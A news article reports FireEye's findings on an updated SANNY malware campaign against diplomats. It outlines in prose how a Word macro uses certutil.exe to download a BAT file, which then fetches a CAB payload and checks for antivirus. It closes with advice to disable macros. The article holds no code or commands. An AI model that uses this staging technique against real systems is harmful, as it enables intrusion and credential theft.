Cybersecurity researchers from FireEye have posted a report to their blog detailing a new delivery method for SANNY malware. The SANNY threat was first tracked by FireEye in 2012, and it has since been used to collect the personal information of “English and Russian-language diplomatic victims,” as reported by ThreatPost.
In its original form, the malware found its way to victims alongside a Word document. When opened, the document file dropped an executable file. Once operational, the malware would scan and harvest log-ins and passwords for e-mail and social media accounts.
The threat actors using SANNY, believed to be operating on the Korean peninsula, have updated the malware to utilize a multistage attack. Also, unlike its previous iterations, the SANNY malware can infect systems that run Windows 10 and issue a bypass for the User Account Control, which generates a pop-up informing users that a program is attempting to make changes to their computer.
How the Updated SANNY Malware Works
Like its predecessor, the initial attack still comes in via a Word document (written in either English or Cyrillic). However, the malicious code is embedded in a macro in the document. This macro contains a text box, and when activated, it executes a command that then immediately overwrites the evidence of the command.
During Stage 1, the macro uses the certutil.exe command utility to download an encoded Batch (BAT) file, which the macro then decodes into the %TEMP% directory. In Stage 2, the BAT file will then download a Cabinet (CAB) file, which contains the malware, along with other configuration files. The BAT file will scan the system for antivirus software. If found, the malware will react and alter its installation accordingly. Once installed, the attack stems from these CAB files.
The researchers note that apart from the delivery system, the malware itself hasn’t changed.
What makes the updated SANNY more of a threat is its multistage approach. Because the malware is nested in several layers, it makes it harder to reverse-engineer a security solution to the attack.
The FireEye team says that you can protect yourself from SANNY “by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.”